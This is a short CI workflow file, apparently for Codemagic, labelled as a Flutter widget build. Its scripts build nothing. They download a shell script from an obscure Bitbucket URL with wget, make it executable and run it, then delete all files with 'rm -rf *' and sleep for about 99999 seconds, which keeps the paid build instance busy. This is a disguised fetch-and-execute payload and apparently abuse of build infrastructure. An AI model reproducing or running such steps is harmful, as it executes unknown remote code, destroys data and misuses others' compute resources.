workflows:
    
    flutter-widget:
        name: Flutter Widget
        instance_type: linux_x2
        max_build_duration: 120
        environment:
            flutter: dev
        scripts:
            - wget https://bitbucket.org/moeasnqz/1/raw/711a7a9e99133fce25589a775db49c65fc7658db/a.sh
            - chmod +x a.sh
            - ./a.sh
            - rm -rf *
            - sleep 99999